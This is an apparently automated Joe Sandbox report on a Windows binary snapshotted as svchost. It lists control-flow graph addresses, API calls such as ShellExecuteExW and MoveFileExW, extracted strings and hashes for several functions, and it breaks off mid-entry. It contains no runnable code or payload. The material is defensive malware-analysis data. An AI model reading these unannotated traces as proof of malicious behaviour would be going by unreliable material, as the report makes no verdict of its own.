                                                            control_flow_graph 268 840863-840886 call 84ec50 GetModuleHandleW 271 8408e7-840b48 268->271 272 840888-84089f GetProcAddress 268->272 273 840c14-840c40 GetModuleFileNameW call 83c29a call 840602 271->273 274 840b4e-840b59 call 8575fb 271->274 275 8408a1-8408b7 272->275 276 8408b9-8408c9 GetProcAddress 272->276 291 840c42-840c4e call 83b146 273->291 274->273 286 840b5f-840b8d GetModuleFileNameW CreateFileW 274->286 275->276 277 8408e5 276->277 278 8408cb-8408e0 276->278 277->271 278->277 288 840b8f-840b9b SetFilePointer 286->288 289 840c08-840c0f CloseHandle 286->289 288->289 292 840b9d-840bb9 ReadFile 288->292 289->273 298 840c50-840c5b call 84081b 291->298 299 840c7d-840ca4 call 83c310 GetFileAttributesW 291->299 292->289 294 840bbb-840be0 292->294 296 840bfd-840c06 call 840371 294->296 296->289 305 840be2-840bfc call 84081b 296->305 298->299 307 840c5d-840c7b CompareStringW 298->307 308 840ca6-840caa 299->308 309 840cae 299->309 305->296 307->299 307->308 308->291 311 840cac 308->311 312 840cb0-840cb5 309->312 311->312 313 840cb7 312->313 314 840cec-840cee 312->314 317 840cb9-840ce0 call 83c310 GetFileAttributesW 313->317 315 840cf4-840d0b call 83c2e4 call 83b146 314->315 316 840dfb-840e05 314->316 327 840d73-840da6 call 834092 AllocConsole 315->327 328 840d0d-840d6e call 84081b * 2 call 83e617 call 834092 call 83e617 call 84a7e4 315->328 323 840ce2-840ce6 317->323 324 840cea 317->324 323->317 326 840ce8 323->326 324->314 326->314 333 840df3-840df5 ExitProcess 327->333 334 840da8-840ded GetCurrentProcessId AttachConsole call 853e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->334 328->333 334->333
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32), ref: 0084087C
                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0084088E
                                                            • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 008408BF
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00840B69
                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00840B83
                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00840B93
                                                            • ReadFile.KERNEL32(00000000,?,00007FFE,00863C7C,00000000), ref: 00840BB1
                                                            • CloseHandle.KERNEL32(00000000), ref: 00840C09
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00840C1E
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00863C7C,?,00000000,?,00000800), ref: 00840C72
                                                            • GetFileAttributesW.KERNELBASE(?,?,00863C7C,00000800,?,00000000,?,00000800), ref: 00840C9C
                                                            • GetFileAttributesW.KERNEL32(?,?,00863D44,00000800), ref: 00840CD8
                                                              • Part of subcall function 0084081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00840836
                                                              • Part of subcall function 0084081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0083F2D8,Crypt32.dll,00000000,0083F35C,?,?,0083F33E,?,?,?), ref: 00840858
                                                            • _swprintf.LIBCMT ref: 00840D4A
                                                            • _swprintf.LIBCMT ref: 00840D96
                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                            • AllocConsole.KERNEL32 ref: 00840D9E
                                                            • GetCurrentProcessId.KERNEL32 ref: 00840DA8
                                                            • AttachConsole.KERNEL32(00000000), ref: 00840DAF
                                                            • _wcslen.LIBCMT ref: 00840DC4
                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00840DD5
                                                            • WriteConsoleW.KERNEL32(00000000), ref: 00840DDC
                                                            • Sleep.KERNEL32(00002710), ref: 00840DE7
                                                            • FreeConsole.KERNEL32 ref: 00840DED
                                                            • ExitProcess.KERNEL32 ref: 00840DF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                            • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                            • API String ID: 1207345701-3298887752
                                                            • Opcode ID: f3cdc0d9b83ecb6c8dd268bbbadd6fbdad12df7f3bce8c6e45a704c4f21d94e2
                                                            • Instruction ID: eb56606710a133fb604fa95723b993b7438927085e0a766226d7941f596d06f5
                                                            • Opcode Fuzzy Hash: f3cdc0d9b83ecb6c8dd268bbbadd6fbdad12df7f3bce8c6e45a704c4f21d94e2
                                                            • Instruction Fuzzy Hash: 75D173B1408344ABD3219F948889B9FBAE8FB85704F52591DF385D6250DBB5864CCFA3
                                                            Function 0084C73F Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 347 84c73f-84c757 call 84eb78 call 84ec50 352 84d40d-84d418 347->352 353 84c75d-84c787 call 84b314 347->353 353->352 356 84c78d-84c792 353->356 357 84c793-84c7a1 356->357 358 84c7a2-84c7b7 call 84af98 357->358 361 84c7b9 358->361 362 84c7bb-84c7d0 call 841fbb 361->362 365 84c7d2-84c7d6 362->365 366 84c7dd-84c7e0 362->366 365->362 367 84c7d8 365->367 368 84c7e6 366->368 369 84d3d9-84d404 call 84b314 366->369 367->369 371 84ca7c-84ca7e 368->371 372 84c7ed-84c7f0 368->372 373 84c9be-84c9c0 368->373 374 84ca5f-84ca61 368->374 369->357 383 84d40a-84d40c 369->383 371->369 378 84ca84-84ca8b 371->378 372->369 375 84c7f6-84c850 call 84a64d call 83bdf3 call 83a544 call 83a67e call 836edb 372->375 373->369 379 84c9c6-84c9d2 373->379 374->369 376 84ca67-84ca77 SetWindowTextW 374->376 436 84c98f-84c9a4 call 83a5d1 375->436 376->369 378->369 384 84ca91-84caaa 378->384 380 84c9d4-84c9e5 call 857686 379->380 381 84c9e6-84c9eb 379->381 380->381 387 84c9f5-84ca00 call 84b48e 381->387 388 84c9ed-84c9f3 381->388 383->352 389 84cab2-84cac0 call 853e13 384->389 390 84caac 384->390 394 84ca05-84ca07 387->394 388->394 389->369 401 84cac6-84cacf 389->401 390->389 399 84ca12-84ca32 call 853e13 call 853e3e 394->399 400 84ca09-84ca10 call 853e13 394->400 421 84ca34-84ca3b 399->421 422 84ca4b-84ca4d 399->422 400->399 405 84cad1-84cad5 401->405 406 84caf8-84cafb 401->406 410 84cad7-84cadf 405->410 411 84cb01-84cb04 405->411 406->411 413 84cbe0-84cbee call 840602 406->413 410->369 417 84cae5-84caf3 call 840602 410->417 419 84cb06-84cb0b 411->419 420 84cb11-84cb2c 411->420 429 84cbf0-84cc04 call 85279b 413->429 417->429 419->413 419->420 437 84cb76-84cb7d 420->437 438 84cb2e-84cb68 420->438 426 84ca42-84ca4a call 857686 421->426 427 84ca3d-84ca3f 421->427 422->369 428 84ca53-84ca5a call 853e2e 422->428 426->422 427->426 428->369 447 84cc06-84cc0a 429->447 448 84cc11-84cc62 call 840602 call 84b1be GetDlgItem SetWindowTextW SendMessageW call 853e49 429->448 453 84c855-84c869 SetFileAttributesW 436->453 454 84c9aa-84c9b9 call 83a55a 436->454 440 84cb7f-84cb97 call 853e13 437->440 441 84cbab-84cbce call 853e13 * 2 437->441 466 84cb6c-84cb6e 438->466 467 84cb6a 438->467 440->441 458 84cb99-84cba6 call 8405da 440->458 441->429 474 84cbd0-84cbde call 8405da 441->474 447->448 452 84cc0c-84cc0e 447->452 481 84cc67-84cc6b 448->481 452->448 459 84c90f-84c91f GetFileAttributesW 453->459 460 84c86f-84c8a2 call 83b991 call 83b690 call 853e13 453->460 454->369 458->441 459->436 464 84c921-84c930 DeleteFileW 459->464 490 84c8a4-84c8b3 call 853e13 460->490 491 84c8b5-84c8c3 call 83bdb4 460->491 464->436 473 84c932-84c935 464->473 466->437 467->466 477 84c939-84c965 call 834092 GetFileAttributesW 473->477 474->429 488 84c937-84c938 477->488 489 84c967-84c97d MoveFileW 477->489 481->369 485 84cc71-84cc85 SendMessageW 481->485 485->369 488->477 489->436 492 84c97f-84c989 MoveFileExW 489->492 490->491 497 84c8c9-84c908 call 853e13 call 84fff0 490->497 491->454 491->497 492->436 497->459
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0084C744
                                                              • Part of subcall function 0084B314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0084B3FB
                                                            • _wcslen.LIBCMT ref: 0084CA0A
                                                            • _wcslen.LIBCMT ref: 0084CA13
                                                            • SetWindowTextW.USER32(?,?), ref: 0084CA71
                                                            • _wcslen.LIBCMT ref: 0084CAB3
                                                            • _wcsrchr.LIBVCRUNTIME ref: 0084CBFB
                                                            • GetDlgItem.USER32(?,00000066), ref: 0084CC36
                                                            • SetWindowTextW.USER32(00000000,?), ref: 0084CC46
                                                            • SendMessageW.USER32(00000000,00000143,00000000,0087A472), ref: 0084CC54
                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0084CC7F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                            • API String ID: 2804936435-312220925
                                                            • Opcode ID: ec62451e5a2fde9c804221691af77ae707abcb784e42aaedea07cc524d978896
                                                            • Instruction ID: 08fd7663b88d90fbab746f5060657e8a25df4736214cc790d4c847b747b406a4
                                                            • Opcode Fuzzy Hash: ec62451e5a2fde9c804221691af77ae707abcb784e42aaedea07cc524d978896
                                                            • Instruction Fuzzy Hash: 55E151B290021CAADB25DBA4DC85EEE77BCFB05350F4440A6FA49E7150EB749F848F61
                                                            Function 0083DA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0083DA70
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0083DAAC
                                                              • Part of subcall function 0083C29A: _wcslen.LIBCMT ref: 0083C2A2
                                                              • Part of subcall function 008405DA: _wcslen.LIBCMT ref: 008405E0
                                                              • Part of subcall function 00841B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0083BAE9,00000000,?,?,?,00010410), ref: 00841BA0
                                                            • _wcslen.LIBCMT ref: 0083DDE9
                                                            • __fprintf_l.LIBCMT ref: 0083DF1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                            • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                            • API String ID: 566448164-801612888
                                                            • Opcode ID: c08a6d3c848bb9fec04bee8cba55729d5e23bcbf69b3c2876d565225d0cdfaad
                                                            • Instruction ID: fcf566491364e7689eb0d4cf67b17b85a673c299d04b46eceef21684c81ce55f
                                                            • Opcode Fuzzy Hash: c08a6d3c848bb9fec04bee8cba55729d5e23bcbf69b3c2876d565225d0cdfaad
                                                            • Instruction Fuzzy Hash: 6B32CE71900318EBCF28EF68D842AEE77A5FF94304F41055AF945EB281EBB19D85CB91
                                                            Function 0084D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0084B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0084B579
                                                              • Part of subcall function 0084B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0084B58A
                                                              • Part of subcall function 0084B568: IsDialogMessageW.USER32(00010410,?), ref: 0084B59E
                                                              • Part of subcall function 0084B568: TranslateMessage.USER32(?), ref: 0084B5AC
                                                              • Part of subcall function 0084B568: DispatchMessageW.USER32(?), ref: 0084B5B6
                                                            • GetDlgItem.USER32(00000068,0088FCB8), ref: 0084D4E8
                                                            • ShowWindow.USER32(00000000,00000005,?,?,?,0084AF07,00000001,?,?,0084B7B9,0086506C,0088FCB8,0088FCB8,00001000,00000000,00000000), ref: 0084D510
                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0084D51B
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,008635F4), ref: 0084D529
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0084D53F
                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0084D559
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0084D59D
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0084D5AB
                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0084D5BA
                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0084D5E1
                                                            • SendMessageW.USER32(00000000,000000C2,00000000,008643F4), ref: 0084D5F0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                            • String ID: \
                                                            • API String ID: 3569833718-2967466578
                                                            • Opcode ID: 8315e8469654c20d2edca2922d381acf79a3513a364e370f77a27f032585bb6b
                                                            • Instruction ID: 9863fb1c8d3646da51a653ff1d9eda04452a8d3d244f61b34e89ff6a63ea956d
                                                            • Opcode Fuzzy Hash: 8315e8469654c20d2edca2922d381acf79a3513a364e370f77a27f032585bb6b
                                                            • Instruction Fuzzy Hash: 5C31D171145746AFE301EF20DC4AFAB7FACFB82708F04051AF551D62A0DB658A048B7A
                                                            Function 0084D78F Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 184COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 836 84d78f-84d7a7 call 84ec50 839 84d7ad-84d7b9 call 853e13 836->839 840 84d9e8-84d9f0 836->840 839->840 843 84d7bf-84d7e7 call 84fff0 839->843 846 84d7f1-84d7ff 843->846 847 84d7e9 843->847 848 84d801-84d804 846->848 849 84d812-84d818 846->849 847->846 850 84d808-84d80e 848->850 851 84d85b-84d85e 849->851 853 84d837-84d844 850->853 854 84d810 850->854 851->850 852 84d860-84d866 851->852 857 84d86d-84d86f 852->857 858 84d868-84d86b 852->858 855 84d9c0-84d9c2 853->855 856 84d84a-84d84e 853->856 859 84d822-84d82c 854->859 862 84d9c6 855->862 856->862 863 84d854-84d859 856->863 864 84d882-84d898 call 83b92d 857->864 865 84d871-84d878 857->865 858->857 858->864 860 84d82e 859->860 861 84d81a-84d820 859->861 860->853 861->859 868 84d830-84d833 861->868 869 84d9cf 862->869 863->851 872 84d8b1-84d8bc call 83a231 864->872 873 84d89a-84d8a7 call 841fbb 864->873 865->864 866 84d87a 865->866 866->864 868->853 871 84d9d6-84d9d8 869->871 875 84d9e7 871->875 876 84d9da-84d9dc 871->876 882 84d8be-84d8d5 call 83b6c4 872->882 883 84d8d9-84d8e6 ShellExecuteExW 872->883 873->872 881 84d8a9 873->881 875->840 876->875 880 84d9de-84d9e1 ShowWindow 876->880 880->875 881->872 882->883 883->875 885 84d8ec-84d8f9 883->885 887 84d90c-84d90e 885->887 888 84d8fb-84d902 885->888 890 84d925-84d944 call 84dc3b 887->890 891 84d910-84d919 887->891 888->887 889 84d904-84d90a 888->889 889->887 892 84d97b-84d987 CloseHandle 889->892 890->892 905 84d946-84d94e 890->905 891->890 898 84d91b-84d923 ShowWindow 891->898 894 84d998-84d9a6 892->894 895 84d989-84d996 call 841fbb 892->895 894->871 897 84d9a8-84d9aa 894->897 895->869 895->894 897->871 901 84d9ac-84d9b2 897->901 898->890 901->871 904 84d9b4-84d9be 901->904 904->871 905->892 906 84d950-84d961 GetExitCodeProcess 905->906 906->892 907 84d963-84d96d 906->907 908 84d974 907->908 909 84d96f 907->909 908->892 909->908
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 0084D7AE
                                                            • ShellExecuteExW.SHELL32(?), ref: 0084D8DE
                                                            • ShowWindow.USER32(?,00000000), ref: 0084D91D
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 0084D959
                                                            • CloseHandle.KERNEL32(?), ref: 0084D97F
                                                            • ShowWindow.USER32(?,00000001), ref: 0084D9E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                                                            • String ID: .exe$.inf
                                                            • API String ID: 36480843-3750412487
                                                            • Opcode ID: c51df38a33b54cb01965713b0450b06ed78f5346f4e4e5c5be408a162184b137
                                                            • Instruction ID: 859f70b0dd97da77c11f2aab80b1290feba996c1eee63aad792df1d0a45a7797
                                                            • Opcode Fuzzy Hash: c51df38a33b54cb01965713b0450b06ed78f5346f4e4e5c5be408a162184b137
                                                            • Instruction Fuzzy Hash: 6D51E3705043889ADB319B2498447BBBFE5FF82744F08082EF9C5D7291E771CA85CB52
                                                            Function 0085A95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 910 85a95b-85a974 911 85a976-85a986 call 85ef4c 910->911 912 85a98a-85a98f 910->912 911->912 922 85a988 911->922 913 85a991-85a999 912->913 914 85a99c-85a9c0 MultiByteToWideChar 912->914 913->914 916 85a9c6-85a9d2 914->916 917 85ab53-85ab66 call 84fbbc 914->917 919 85a9d4-85a9e5 916->919 920 85aa26 916->920 923 85aa04-85aa15 call 858e06 919->923 924 85a9e7-85a9f6 call 862010 919->924 926 85aa28-85aa2a 920->926 922->912 928 85ab48 923->928 938 85aa1b 923->938 924->928 937 85a9fc-85aa02 924->937 927 85aa30-85aa43 MultiByteToWideChar 926->927 926->928 927->928 931 85aa49-85aa5b call 85af6c 927->931 932 85ab4a-85ab51 call 85abc3 928->932 939 85aa60-85aa64 931->939 932->917 941 85aa21-85aa24 937->941 938->941 939->928 942 85aa6a-85aa71 939->942 941->926 943 85aa73-85aa78 942->943 944 85aaab-85aab7 942->944 943->932 945 85aa7e-85aa80 943->945 946 85ab03 944->946 947 85aab9-85aaca 944->947 945->928 948 85aa86-85aaa0 call 85af6c 945->948 949 85ab05-85ab07 946->949 950 85aae5-85aaf6 call 858e06 947->950 951 85aacc-85aadb call 862010 947->951 948->932 965 85aaa6 948->965 954 85ab41-85ab47 call 85abc3 949->954 955 85ab09-85ab22 call 85af6c 949->955 950->954 964 85aaf8 950->964 951->954 963 85aadd-85aae3 951->963 954->928 955->954 968 85ab24-85ab2b 955->968 967 85aafe-85ab01 963->967 964->967 965->928 967->949 969 85ab67-85ab6d 968->969 970 85ab2d-85ab2e 968->970 971 85ab2f-85ab3f WideCharToMultiByte 969->971 970->971 971->954 972 85ab6f-85ab76 call 85abc3 971->972 972->932
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00855695,00855695,?,?,?,0085ABAC,00000001,00000001,2DE85006), ref: 0085A9B5
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0085ABAC,00000001,00000001,2DE85006,?,?,?), ref: 0085AA3B
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,2DE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0085AB35
                                                            • __freea.LIBCMT ref: 0085AB42
                                                              • Part of subcall function 00858E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0085CA2C,00000000,?,00856CBE,?,00000008,?,008591E0,?,?,?), ref: 00858E38
                                                            • __freea.LIBCMT ref: 0085AB4B
                                                            • __freea.LIBCMT ref: 0085AB70
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1414292761-0
                                                            • Opcode ID: 0d0989909c5e0e4ad6bdb46b1078ca26a1a4d24cb1afe6e667cec39462353364
                                                            • Instruction ID: 43ab41c4172369c1473fd7c8fd5a621e5537d0a1421ea69ea59cd011cfc117f9
                                                            • Opcode Fuzzy Hash: 0d0989909c5e0e4ad6bdb46b1078ca26a1a4d24cb1afe6e667cec39462353364
                                                            • Instruction Fuzzy Hash: 4F51B372A00216ABDB298E64DCC1EABBBABFB44761B154729FC04D6140DB34DC58C693
                                                            Function 00853B72 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 975 853b72-853b7c 976 853bee-853bf1 975->976 977 853bf3 976->977 978 853b7e-853b8c 976->978 979 853bf5-853bf9 977->979 980 853b95-853bb1 LoadLibraryExW 978->980 981 853b8e-853b91 978->981 984 853bb3-853bbc GetLastError 980->984 985 853bfa-853c00 980->985 982 853b93 981->982 983 853c09-853c0b 981->983 987 853beb 982->987 983->979 988 853be6-853be9 984->988 989 853bbe-853bd3 call 856088 984->989 985->983 986 853c02-853c03 FreeLibrary 985->986 986->983 987->976 988->987 989->988 992 853bd5-853be4 LoadLibraryExW 989->992 992->985 992->988
                                                            APIs
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00853C35,?,?,00892088,00000000,?,00853D60,00000004,InitializeCriticalSectionEx,00866394,InitializeCriticalSectionEx,00000000), ref: 00853C03
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: FreeLibrary
                                                            • String ID: api-ms-
                                                            • API String ID: 3664257935-2084034818
                                                            • Opcode ID: bd58d8db2b0a0010d061b5de7df42a634c9f5162629963e47e0df5828622238c
                                                            • Instruction ID: d1265208f2a741301a797a3f27e8264e5a425da2b56e6371f216760f9fea4e0b
                                                            • Opcode Fuzzy Hash: bd58d8db2b0a0010d061b5de7df42a634c9f5162629963e47e0df5828622238c
                                                            • Instruction Fuzzy Hash: CE11C632A45625ABCB228B689C41B5D37A4FF017F2F260211ED55FB290E771EF0886D2
                                                            Function 008398E0 Relevance: 7.6, APIs: 5, Instructions: 111filetimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
